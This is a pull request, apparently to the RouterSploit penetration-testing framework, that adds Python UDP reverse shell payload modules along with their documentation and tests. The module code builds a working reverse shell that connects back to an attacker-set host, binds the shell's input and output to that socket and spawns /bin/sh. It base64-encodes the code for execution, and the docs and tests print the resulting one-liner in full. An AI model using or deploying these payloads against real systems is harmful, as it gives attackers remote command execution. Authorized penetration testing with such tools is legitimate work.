### PR TITLE
Adding Python UDP Reverse Shell payloads

### DIFF
--- a/docs/modules/payloads/cmd/python_reverse_udp.md
+++ b/docs/modules/payloads/cmd/python_reverse_udp.md
@@ -1,0 +1,26 @@
+## Description
+
+Module generates payload that creates interactive udp reverse shell by using python one-liner. 
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use payloads/cmd/python_reverse_udp`
+  3. Do: `set lhost 192.168.1.4`
+  4. Do: `set lport 4321`
+  5. Do: `run`
+  6. Module generates python udp reverse shell payload
+
+## Scenarios
+
+```
+rsf > use payloads/cmd/python_reverse_udp
+rsf (Python Reverse UDP One-Liner) > set lhost 192.168.1.4
+[+] lhost => 192.168.1.4
+rsf (Python Reverse UDP One-Liner) > set lport 4321
+[+] lport => 4321
+rsf (Python Reverse UDP One-Liner) > run
+[*] Running module...
+[*] Generating payload
+python -c "exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))"
+```

--- a/docs/modules/payloads/python/reverse_udp.md
+++ b/docs/modules/payloads/python/reverse_udp.md
@@ -1,0 +1,26 @@
+## Description
+
+Module generates payload that creates interactive udp reverse shell by using python. 
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use payloads/python/reverse_udp`
+  3. Do: `set lhost 192.168.1.4`
+  3. Do: `set lport 4321`
+  4. Do: `run`
+  5. Module generates python udp reverse shell payload
+
+## Scenarios
+
+```
+rsf > use payloads/python/reverse_udp
+rsf (Python Reverse UDP) > set lhost 192.168.1.4
+[+] lhost => 192.168.1.4
+rsf (Python Reverse UDP) > set lport 4321
+[+] lport => 4321
+rsf (Python Reverse UDP) > run
+[*] Running module...
+[*] Generating payload
+exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))
+```

--- a/routersploit/modules/payloads/cmd/python_reverse_udp.py
+++ b/routersploit/modules/payloads/cmd/python_reverse_udp.py
@@ -1,0 +1,20 @@
+from routersploit.core.exploit import *
+from routersploit.modules.payloads.python.reverse_udp import Exploit as PythonBindUDP
+
+
+class Exploit(PythonBindUDP):
+    __info__ = {
+        "name": "Python Reverse UDP One-Liner",
+        "description": "Creates interactive udp reverse shell by using python one-liner.",
+        "authors": (
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        )
+    }
+
+    cmd = OptString("python", "Python binary")
+
+    def generate(self):
+        payload = super(Exploit, self).generate()
+
+        cmd = '{} -c "{}"'.format(self.cmd, payload)
+        return cmd

--- a/routersploit/modules/payloads/python/reverse_udp.py
+++ b/routersploit/modules/payloads/python/reverse_udp.py
@@ -1,0 +1,30 @@
+from base64 import b64encode
+from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
+
+
+class Exploit(ReverseTCPPayloadMixin, GenericPayload):
+    __info__ = {
+        "name": "Python Reverse UDP",
+        "description": "Creates interactive udp reverse shell by using python.",
+        "authors": (
+            "Andre Marques (zc00l)",  # shellpop
+            "Marcin Bury <marcin[at]threat9.com>"  # routersploit module
+        ),
+    }
+
+    def generate(self):
+        payload = (
+            "import os\n" +
+            "import pty\n" +
+            "import socket\n" +
+            "s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n" +
+            "s.connect(('{}',{}))\n".format(self.lhost, self.lport) +
+            "os.dup2(s.fileno(), 0)\n" +
+            "os.dup2(s.fileno(), 1)\n" +
+            "os.dup2(s.fileno(), 2)\n" +
+            "pty.spawn('/bin/sh');\n" +
+            "s.close()\n"
+        )
+
+        encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
+        return "exec('{}'.decode('base64'))".format(encoded_payload)

--- a/tests/payloads/cmd/test_python_reverse_udp.py
+++ b/tests/payloads/cmd/test_python_reverse_udp.py
@@ -1,0 +1,17 @@
+from routersploit.modules.payloads.cmd.python_reverse_udp import Exploit
+
+
+# reverse udp payload with lhost=192.168.1.4 lport=4321
+reverse_udp = (
+    "python -c \"exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))\""
+)
+
+
+def test_payload_generation():
+    """ Test scenario - payload generation """
+
+    payload = Exploit()
+    payload.lhost = "192.168.1.4"
+    payload.lport = 4321
+
+    assert payload.generate() == reverse_udp

--- a/tests/payloads/python/test_reverse_udp.py
+++ b/tests/payloads/python/test_reverse_udp.py
@@ -1,0 +1,17 @@
+from routersploit.modules.payloads.python.reverse_udp import Exploit
+
+
+# reverse udp payload with lhost=192.168.1.4 lport=4321
+reverse_udp = (
+    "exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))"
+)
+
+
+def test_payload_generation():
+    """ Test scenario - payload generation """
+
+    payload = Exploit()
+    payload.lhost = "192.168.1.4"
+    payload.lport = 4321
+
+    assert payload.generate() == reverse_udp


### PR DESCRIPTION
## Status
**READY**

## Description
This PR adds Python UDP reverse shell payload and Python UDP reverse shell one-liner

## Verification
Python UDP Reverse Shell:
  1. Start `./rsf.py`
  2. Do: `use payloads/python/reverse_udp`
  3. Do: `set lhost 192.168.1.4`
  3. Do: `set lport 4321`
  4. Do: `run`
  5. Module generates python udp reverse shell payload

Python UDP Reverse Shell One-Liner:
  1. Start `./rsf.py`
  2. Do: `use payloads/cmd/python_reverse_udp`
  3. Do: `set lhost 192.168.1.4`
  4. Do: `set lport 4321`
  5. Do: `run`
  6. Module generates python udp reverse shell payload

## Checklist
- [x] Write module/feature 
- [x] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py))
- [x] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md))
